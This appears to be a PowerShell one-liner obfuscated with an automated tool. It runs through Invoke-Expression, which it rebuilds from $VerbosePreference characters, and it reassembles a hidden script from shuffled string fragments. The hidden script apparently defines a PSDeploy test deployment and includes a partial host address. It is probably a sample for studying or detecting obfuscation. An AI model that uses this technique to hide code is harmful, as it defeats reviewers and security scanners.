. ( $veRbOsePreFERENCE.TOSTRInG()[1,3]+'x'-JOIN'')((("{48}{10}{5}{8}{70}{54}{21}{18}{37}{67}{47}{65}{16}{6}{72}{12}{55}{38}{59}{50}{60}{40}{56}{13}{7}{78}{77}{46}{20}{64}{71}{69}{29}{79}{39}{33}{74}{49}{58}{11}{30}{27}{44}{66}{25}{2}{57}{36}{53}{15}{63}{68}{4}{41}{35}{43}{61}{1}{42}{3}{26}{76}{52}{34}{51}{24}{73}{23}{32}{45}{17}{28}{80}{14}{9}{75}{19}{31}{62}{0}{22}" -f '
','S','   ','u','  ','oy Tes','  ','n','t {','48)ZjIo','l','n t','W9T','endi','220.78.90R','do','e Modules
    ','8i','om','N','randomtas','p s','
','R48
    }
}','k.ps','    }
','rce ','st','p:16','is','e','UL','
','o','W9Tte','r',' ','eno','e','e ','     D','    F','o','o','.','(R4','st-','  ','Dep','inte','yTo','sttas','s','ran','oo','PSD','ep',' By task','gratio','plo','
   ','m','l','mtask {
','k','   FromSourc','..
','op {
   ','  ',' ','
    By n',' #yeah, this','  To C:','1','f an ','uT-','R48Task','On Te','g',' mor','5.')).RePlaCe(([ChaR]87+[ChaR]57+[ChaR]84),'\').RePlaCe(([ChaR]90+[ChaR]106+[ChaR]73),'|').RePlaCe('R48',[sTRing][ChaR]39)) 
